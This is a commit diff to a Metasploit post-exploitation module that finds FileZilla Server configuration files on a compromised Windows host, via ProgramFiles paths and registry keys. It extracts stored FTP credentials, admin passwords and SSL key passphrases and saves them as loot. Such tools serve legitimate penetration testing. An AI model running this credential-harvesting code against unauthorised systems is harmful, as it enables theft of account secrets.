Handle errors when parsing interfaces.xml, add check for several locations

bug/bundler_fix
nk 2016-02-11 15:56:58 +01:00
parent 2386cb1344
commit bc74ceb8c5
1 changed files with 53 additions and 27 deletions

View File

@ -37,35 +37,59 @@ class Metasploit3 < Msf::Post
return
end
@progs = "#{session.sys.config.getenv('ProgramFiles')}\\"
progfiles_env = session.sys.config.getenvs('ProgramFiles', 'ProgramFiles(x86)', 'ProgramW6432')
locations = []
progfiles_env.each do |k, v|
next if v.blank?
locations << v + "\\FileZilla Server\\"
end
filezilla = check_filezilla
begin
root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\FileZilla Server")
open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
locations << open_key.query_value("install_dir").data + "\\"
rescue Rex::Post::Meterpreter::RequestError => e
vprint_error(e.message)
end
begin
root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Wow6432Node\\FileZilla Server")
open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ)
locations << open_key.query_value("install_dir").data + "\\"
rescue Rex::Post::Meterpreter::RequestError => e
vprint_error(e.message)
end
locations = locations.uniq
filezilla = check_filezilla(locations)
get_filezilla_creds(filezilla) if filezilla
end
def check_filezilla
def check_filezilla(locations)
paths = []
path = @progs + "FileZilla Server\\"
print_status("Checking for Filezilla Server directory in: #{path}")
begin
session.fs.dir.entries(path)
rescue ::Exception => e
print_error(e.to_s)
return
end
session.fs.dir.foreach(path) do |fdir|
locations.each do |location|
print_status("Checking for Filezilla Server directory in: #{location}")
begin
session.fs.dir.foreach("#{location}") do |fdir|
['FileZilla Server.xml','FileZilla Server Interface.xml'].each do |xmlfile|
if fdir == xmlfile
filepath = path + xmlfile
vprint_status("Configuration file found: #{filepath}")
filepath = location + xmlfile
print_status("Configuration file found: #{filepath}")
paths << filepath
end
end
end
rescue Rex::Post::Meterpreter::RequestError => e
vprint_error(e.message)
end
end
rescue ::Exception => e
print_error(e.to_s)
return
end
if !paths.empty?
print_good("Found FileZilla Server on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
@ -249,16 +273,18 @@ class Metasploit3 < Msf::Post
configuration << [config['ftp_port'], config['ftp_bindip'], config['admin_port'], config['admin_bindip'],
config['admin_pass'], config['ssl'], config['ssl_certfile'], config['ssl_keypass']]
begin
lastser = parse_interface(fsi_xml)
lastserver << [lastser['ip'], lastser['port'], lastser['password']]
vprint_status("Last Server Information:")
vprint_status(" IP: #{lastser['ip']}")
vprint_status(" Port: #{lastser['port']}")
vprint_status(" Password: #{lastser['password']}")
vprint_line
rescue
vprint_error("Could not parse FileZilla Server Interface.xml")
end
p = store_loot("filezilla.server.creds", "text/csv", session, credentials.to_csv,
"filezilla_server_credentials.csv", "FileZilla FTP Server Credentials")
print_status("Credentials saved in: #{p.to_s}")